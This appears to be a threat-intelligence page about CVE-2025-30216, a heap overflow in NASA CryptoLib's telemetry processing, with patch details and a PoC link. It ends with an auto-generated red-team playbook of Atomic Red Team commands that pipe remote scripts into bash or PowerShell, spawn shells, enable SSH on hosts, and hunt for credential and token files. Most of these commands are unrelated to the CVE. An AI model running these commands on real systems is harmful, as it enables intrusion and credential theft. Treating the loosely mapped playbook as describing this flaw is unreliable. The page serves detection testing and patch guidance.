CVE-2025-30216
Overview
This vulnerability is a heap overflow occurring in the Crypto_TM_ProcessSecurity function within the nasa CryptoLib component. The flaw arises when the function processes the Secondary Header Length field of a Telemetry (TM) protocol packet; if this length exceeds the total packet length, a memcpy operation copies data beyond the allocated heap buffer p_new_dec_frame. This improper bounds checking leads to adjacent heap memory corruption during packet processing of the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP).
Vulnerability Description
CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. In versions 1.3.3 and prior, a Heap Overflow vulnerability occurs in the `Crypto_TM_ProcessSecurity` function (`crypto_tm.c:1735:8`). When processing the Secondary Header Length of a TM protocol packet, if the Secondary Header Length exceeds the packet's total length, a heap overflow is triggered during the memcpy operation that copies packet data into the dynamically allocated buffer `p_new_dec_frame`. This allows an attacker to overwrite adjacent heap memory, potentially leading to arbitrary code execution or system instability. A patch is available at commit 810fd66d592c883125272fef123c3240db2f170f.
Impact
An unauthenticated attacker with network access to the spacecraft communication channel can craft a TM protocol packet with a malicious Secondary Header Length to trigger a heap overflow. This can enable arbitrary code execution or cause system instability, potentially disrupting spacecraft operations or compromising mission data integrity. The vulnerability requires no user interaction and has a CVSS vector indicating network attack vector with low complexity and no privileges required (AV:N/AC:L/PR:N/UI:N).
Solution
Apply the patch provided in the nasa CryptoLib repository at commit 810fd66d592c883125272fef123c3240db2f170f to address the heap overflow in Crypto_TM_ProcessSecurity. This fix is included in versions after 1.3.3. Refer to the official GitHub security advisory GHSA-v3jc-5j74-hcjv for detailed patch instructions and verification steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the CryptoLib software, specifically in the `Crypto_TM_ProcessSecurity` function, is characterized by a heap overflow condition that arises when the Secondary Header Length of a telemetry (TM) protocol packet exceeds the total length of the packet. This flaw occurs during a memory copy operation, where the function attempts to transfer data into a dynamically allocated buffer without proper validation of the input parameters. The absence of adequate bounds checking allows an attacker to manipulate the Secondary Header Length, leading to the potential overwriting of adjacent heap memory. This exploitation can result in arbitrary code execution, which poses significant risks to the integrity and availability of systems utilizing this software.
Attack vectors for this vulnerability are particularly concerning due to the nature of the affected product, which is designed for securing communications between spacecraft and ground stations. An attacker could exploit this vulnerability by crafting malicious telemetry packets that contain an oversized Secondary Header Length. Once the crafted packet is processed, the heap overflow would occur, allowing the attacker to overwrite critical data structures in memory. This could lead to various malicious outcomes, including the execution of arbitrary code, which could compromise the spacecraft's operational integrity or disrupt communication with ground control. Additionally, the exploitation could result in system instability, leading to potential mission failures or loss of control over the spacecraft.
The real-world impact of this vulnerability is profound, particularly in the context of aerospace operations. Space missions rely heavily on the integrity and reliability of their communication systems, and any compromise could have catastrophic consequences. The business risks associated with such vulnerabilities extend beyond immediate operational disruptions; they include financial losses, reputational damage, and potential legal liabilities. For organizations involved in space exploration and satellite operations, the implications of a successful attack could jeopardize multi-million dollar missions and undermine public trust in their capabilities. Moreover, the potential for cascading failures in interconnected systems amplifies the urgency for addressing this vulnerability.
To effectively detect and mitigate this vulnerability, organizations must implement a multi-layered security approach. First, regular code audits and vulnerability assessments should be conducted to identify and remediate such flaws before they can be exploited. Static and dynamic analysis tools can be employed to detect unsafe memory operations and ensure that proper bounds checking is enforced in the codebase. Additionally, organizations should establish robust monitoring systems to detect anomalous behavior in telemetry data, which may indicate attempts to exploit the vulnerability.
Furthermore, applying the available patch is critical to mitigating the risks associated with this vulnerability. Organizations should prioritize updating their systems to the latest version of CryptoLib, ensuring that the fix for the heap overflow is implemented. In parallel, training and awareness programs for developers and engineers involved in system design and implementation can foster a culture of security, emphasizing the importance of secure coding practices and the potential ramifications of vulnerabilities. By adopting these strategies, organizations can significantly reduce their exposure to this vulnerability and enhance the overall security posture of their space communication systems.
CSURFACE threat intelligence has identified a notable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-30216, rising by nearly 30%. This upward adjustment reflects a growing likelihood of exploitation attempts targeting the heap overflow vulnerability in CryptoLib’s `Crypto_TM_ProcessSecurity` function. Although our telemetry indicates the trend has stabilized over the past week without rapid escalation, the elevated EPSS score suggests that threat actors are increasingly prioritizing this vulnerability in their operational planning. The availability of a public proof-of-concept exploit further lowers the barrier to attack, potentially accelerating adversary testing and weaponization efforts. Consequently, the risk posture for organizations relying on affected versions of CryptoLib has intensified, warranting heightened vigilance. This development underscores the criticality of monitoring exploitation attempts closely, as the vulnerability’s exploitation could compromise secure communications between spacecraft and ground stations, impacting mission integrity and data confidentiality.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nasa | Cryptolib | All |
cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
oliviaisntcringe/CVE-2025-30216-PoC
PoC
|
oliviaisntcringe | 0 | 0 | 2025-03-26 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-30216 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/nasa/CryptoLib/security/advisories/GHSA-v3jc-5j74-hcjv |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/nasa/CryptoLib/commit/810fd66d592c883125272fef123c3240db2f170f |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/user-attachments/assets/d49cea04-ce84-4d60-bb3a-987e843f09c4 |